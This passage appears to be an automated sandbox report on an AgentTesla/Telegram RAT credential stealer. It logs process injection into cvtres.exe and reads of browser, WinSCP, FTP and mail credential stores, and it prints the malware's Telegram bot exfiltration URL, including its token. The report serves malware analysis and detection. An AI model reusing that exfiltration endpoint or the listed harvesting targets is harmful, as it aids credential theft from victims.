                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598434Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596295Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595968Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595310Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594547Jump to behavior
                      Source: cvtres.exe, 00000002.00000002.4153063580.00000000063A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: FD2008Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1344, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1344, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1344, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1344, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1344, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		111
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model21
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSH1
                      Clipboard Data                      		14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe53%ReversingLabsWin32.Trojan.Generic
                      SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe100%AviraTR/Dropper.Gen
                      SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ipify.org/0%URL Reputationsafe
                      https://api.ipify.org0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocumenttrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegramcvtres.exe, 00000002.00000002.4151053651.000000000359D000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgcvtres.exe, 00000002.00000002.4151053651.000000000314F000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003168000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://api.telegram.orgcvtres.exe, 00000002.00000002.4151053651.0000000003557000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000359D000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    		api.telegram.orgUnited Kingdom
                                    		62041TELEGRAMRUtrue
                                    104.26.12.205
                                    		api.ipify.orgUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545509
                                    Start date and time:2024-10-30 16:22:09 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:7
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@5/1@4/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 67
                                    • Number of non-executed functions: 21
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:23:04API Interceptor11257110x Sleep call for process: cvtres.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    149.154.167.220Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                        JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                            app64.exeGet hashmaliciousUnknownBrowse
                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
